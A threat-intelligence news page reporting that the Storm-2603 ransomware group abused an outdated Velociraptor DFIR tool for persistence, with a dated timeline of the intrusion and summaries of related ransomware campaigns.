Ransomware Operators Abuse Velociraptor for Persistent Access and Deployment
Ransomware operators have begun leveraging Velociraptor, an open-source digital forensics and incident response (DFIR) tool, to facilitate and enhance their attacks on enterprise environments. Cisco Talos confirmed that Velociraptor, previously not definitively linked to ransomware campaigns, was used by threat actors believed to be associated with Storm-2603 and possibly a China-based group. These actors targeted VMware ESXi virtual machines and Windows servers, deploying multiple ransomware strains including Warlock, LockBit, and Babuk, which resulted in significant disruption to the victim's IT infrastructure. The attackers installed an outdated version of Velociraptor (0.73.4.0) that contained a privilege escalation vulnerability (CVE-2025-6264), enabling them to execute arbitrary commands and potentially take over endpoints. Velociraptor was used to maintain stealthy, persistent access, allowing the attackers to operate undetected while preparing and executing the ransomware payloads. In addition to Velociraptor, the attackers utilized the Windows msiexec utility to download and install tools from a Cloudflare Workers domain, including Visual Studio Code and the Radmin remote administration tool, further expanding their control and tunneling capabilities. Visual Studio Code was installed as a service and configured to create a tunnel to an attacker-controlled command-and-control (C2) server, with logs redirected for monitoring. The attackers also used encoded PowerShell commands to automate the download and execution of these tools. Sophos incident responders encountered the same threat actors in a separate incident, where they were able to prevent the final deployment of ransomware, but observed the same tactics, techniques, and procedures (TTPs). The use of Velociraptor in these attacks highlights a growing trend of threat actors repurposing legitimate security tools for malicious purposes, complicating detection and response efforts. The campaign demonstrates the attackers' ability to combine multiple open-source and commercial tools to achieve persistence, lateral movement, and data exfiltration. The presence of Babuk ransomware files on the victim's network marks a new development, as this strain had not previously been associated with Storm-2603. The attackers' use of multiple ransomware variants in a single campaign suggests a flexible and opportunistic approach to maximizing impact. The exploitation of a known vulnerability in Velociraptor underscores the importance of timely patching and monitoring of security tools themselves. The campaign also involved the use of Cloudflare tunneling and remote administration utilities, indicating a sophisticated approach to maintaining access and evading detection. The incident serves as a warning to organizations about the risks of outdated or misconfigured security tools being turned against them. Security teams are advised to monitor for unusual deployments of DFIR tools and to ensure all such software is kept up to date. The blending of legitimate and malicious activity in these attacks poses significant challenges for defenders, requiring enhanced vigilance and advanced detection capabilities.
Timeline
Oct 11, 2025
Halcyon links Storm-2603 to possible China state-backed connections
Subsequent reporting cited Halcyon as assessing that Storm-2603 may have ties to Chinese nation-state actors. The assessment referenced ToolShell access patterns, OPSEC measures, China Standard Time build artifacts, and shared infrastructure across Warlock, LockBit, and Babuk activity.
Oct 10, 2025
Researchers recommend upgrading Velociraptor to patched versions
Following public reporting, researchers advised organizations to update Velociraptor to version 0.73.5 or later to mitigate the privilege-escalation issue tracked as CVE-2025-6264. The guidance came as the campaign highlighted the risks of attackers weaponizing legitimate open-source DFIR tools.
Oct 9, 2025
Cisco Talos publicly attributes the intrusion to Storm-2603
On October 9, 2025, Cisco Talos published research attributing the August intrusion to Storm-2603 with moderate confidence based on overlapping tools, tradecraft, and the unusual use of multiple ransomware families. The report publicly detailed the abuse of Velociraptor for stealthy persistence in ransomware attacks.
Aug 1, 2025
Warlock, LockBit, and Babuk ransomware deployed on victim systems
The intrusion culminated in deployment of multiple ransomware families in a single engagement: LockBit and Warlock-associated encryption on Windows systems and Babuk on VMware ESXi virtual machines. The attack caused severe operational impact and marked the first public association of Storm-2603 with Babuk ransomware.
Aug 1, 2025
Data exfiltration and double-extortion activity observed
The attackers used PowerShell-based scripts to exfiltrate data to an external IP address before or alongside encryption, indicating a double-extortion component. Reporting also describes a separate fileless PowerShell encryptor used in the operation.
Aug 1, 2025
Attackers escalate privileges and weaken defenses
During the intrusion, the actors used the vulnerable Velociraptor build associated with CVE-2025-6264, though Talos could not confirm direct exploitation of the flaw. They also created administrative accounts, modified Group Policy, disabled or weakened Microsoft Defender protections, and used Impacket Smbexec for lateral movement.
Aug 1, 2025
Storm-2603 conducts August 2025 intrusion using Velociraptor
In August 2025, Cisco Talos observed a ransomware intrusion in which attackers installed an outdated Velociraptor version 0.73.4.0 to maintain persistence and control compromised systems. The activity targeted Windows servers and VMware ESXi infrastructure and included access to VMware vSphere.
Aug 1, 2025
Storm-2603 gains initial access via SharePoint ToolShell flaws
Reporting indicates the threat actor used on-premises Microsoft SharePoint "ToolShell" vulnerabilities to obtain initial access before deploying follow-on tooling in the victim environment. This initial compromise is described as preceding the August 2025 ransomware intrusion.
See the full picture in Mallory
Mallory subscribers get deeper analysis on every story, including:
Who’s affected and how
Deep-dive technical analysis
Actionable next steps for your team
IPs, domains, hashes, and more
Ask questions and take action on every story
Filter by topic, classification, timeframe
Get matching stories delivered automatically
Related Entities
Vulnerabilities
Threat Actors
Organizations
Sources
1 more from sources like bleeping computer
Related Stories
Recent Ransomware and Malware Campaigns Targeting Organizations and Individuals
A surge in sophisticated cyberattacks has been observed, with threat actors employing a variety of tactics to compromise organizations and individuals. Notable incidents include the use of the BYOVD (Bring Your Own Vulnerable Driver) technique to deploy DeadLock ransomware, as well as targeted campaigns leveraging phishing emails with HR-related lures to distribute Remcos RAT malware. Additionally, attackers are exploiting popular movie torrents to spread Agent Tesla via layered PowerShell scripts, and Android users in Spain are being targeted by the DroidLock ransomware, which can hijack devices and demand ransom through full-screen overlays. These campaigns demonstrate a trend toward multi-stage infection chains, abuse of legitimate tools and drivers, and the use of social engineering to increase the likelihood of successful compromise. Other significant developments include the targeting of Canadian organizations by the STAC6565/Gold Blade group using QWCrypt ransomware, and the emergence of new threat actor tactics such as disabling endpoint detection and response (EDR) systems to facilitate ransomware deployment. The threat landscape is further complicated by the activities of groups like Scattered Lapsus$ Hunters, who use social engineering and typosquatted domains to compromise Zendesk users, and the exposure of internal dynamics within ransomware groups like BlackBasta, revealing operational stress and internal mistrust. These incidents underscore the evolving nature of cyber threats, the blending of espionage and financial motives, and the increasing sophistication of both technical and social attack vectors.
1 months ago
BlackSuit Ransomware Attack on Global Manufacturer via Compromised VPN Credentials
A major global equipment manufacturer suffered a severe ransomware attack orchestrated by the BlackSuit ransomware group, also known as Ignoble Scorpius. The attack began with a vishing (voice phishing) campaign in which an attacker impersonated the company's IT help desk and convinced an employee to enter their VPN credentials into a phishing site. Using these stolen credentials, the attackers gained initial access to the corporate network. Once inside, they escalated privileges by executing a DCSync attack on a domain controller, allowing them to steal highly privileged credentials, including those of a key service account. The attackers then moved laterally across the network using Remote Desktop Protocol (RDP), Server Message Block (SMB), and tools such as Advanced IP Scanner and SMBExec to map the environment and identify valuable assets. Persistence was established by deploying AnyDesk and a custom remote access trojan (RAT) as scheduled tasks on domain controllers. The threat actors compromised a second domain controller and extracted the NTDS.dit database, which contains all user password hashes, enabling further credential compromise. Over 400 GB of sensitive data was exfiltrated using a renamed rclone utility. To erase forensic evidence and hinder incident response, the attackers deployed CCleaner before launching the ransomware payload. The BlackSuit ransomware was deployed using Ansible, resulting in the simultaneous encryption of hundreds of virtual machines across nearly 60 VMware ESXi hosts, causing widespread operational disruption. The attackers demanded a $20 million ransom, which the organization refused to pay. In response, the manufacturer implemented several security measures, including upgrading to newer Cisco Adaptive Security Appliance firewalls, enforcing multi-factor authentication, segmenting the network, deactivating NTLM, and restricting administrative access to isolated VLANs. The incident highlights the significant risks posed by social engineering and credential theft, as well as the sophisticated tactics used by modern ransomware groups. The attack demonstrates the importance of robust incident response, credential hygiene, and layered security controls to mitigate the impact of such breaches. The use of legitimate remote access tools and living-off-the-land techniques by the attackers complicated detection and response efforts. The exfiltration of large volumes of sensitive data prior to encryption underscores the dual extortion tactics now common among ransomware operators. The manufacturer’s refusal to pay the ransom and rapid implementation of enhanced security controls serve as a case study in post-incident resilience. The attack also illustrates the growing trend of targeting virtualization infrastructure, such as VMware ESXi hosts, to maximize operational disruption. Security researchers and incident responders continue to analyze the tactics, techniques, and procedures (TTPs) used in this attack to inform defensive strategies for other organizations.
1 months ago
Ransomware Gangs Abuse Legitimate Remote Access Tools to Evade Security Controls
Ransomware operators are increasingly leveraging legitimate remote access tools (RATs) such as AnyDesk, Splashtop, UltraViewer, AppAnywhere, RustDesk, CloneDesk, and TightVNC to facilitate their attacks and bypass traditional security measures. These tools, originally intended for IT administration and remote support, are being misused by cybercriminals to gain persistent, stealthy access to victim networks. Attackers exploit the fact that these RATs are often whitelisted and trusted within enterprise environments, allowing them to evade endpoint detection and response (EDR) solutions and other security controls. The use of legitimate RATs enables adversaries to connect to compromised systems without user interaction, transfer malicious binaries, exfiltrate sensitive data, and execute administrative tasks remotely. Encrypted communications provided by these tools further help attackers avoid network monitoring and detection. Security researchers have observed a trend where ransomware gangs prefer these off-the-shelf RATs over custom malware, as their legitimate signatures and widespread use make them less likely to raise suspicion. The abuse of these tools is often facilitated by poor configuration, lack of monitoring, or inadequate management within organizations. Once inside a network, attackers use RATs to move laterally, harvest credentials, and disable security defenses before deploying ransomware payloads. The sophistication of these campaigns has increased, with adversaries employing advanced evasion techniques and maintaining long-term persistence. Organizations are advised to review their use of remote access tools, ensure proper configuration, and monitor for unusual activity associated with these applications. Security teams should also consider implementing stricter application whitelisting and network segmentation to limit the potential impact of RAT abuse. The trend highlights the need for continuous vigilance and updated security policies to address the evolving tactics of ransomware operators. The exploitation of trusted IT tools for malicious purposes underscores the importance of balancing operational convenience with robust security oversight. As ransomware attacks continue to evolve, defenders must adapt their detection and response strategies to account for the abuse of legitimate software. The growing reliance on RATs by threat actors represents a significant challenge for organizations seeking to protect their networks from ransomware threats. Proactive monitoring, user education, and regular security assessments are critical components in mitigating the risks associated with the misuse of remote access tools. Failure to address these vulnerabilities can result in significant data loss, operational disruption, and financial damage due to ransomware incidents.
1 months ago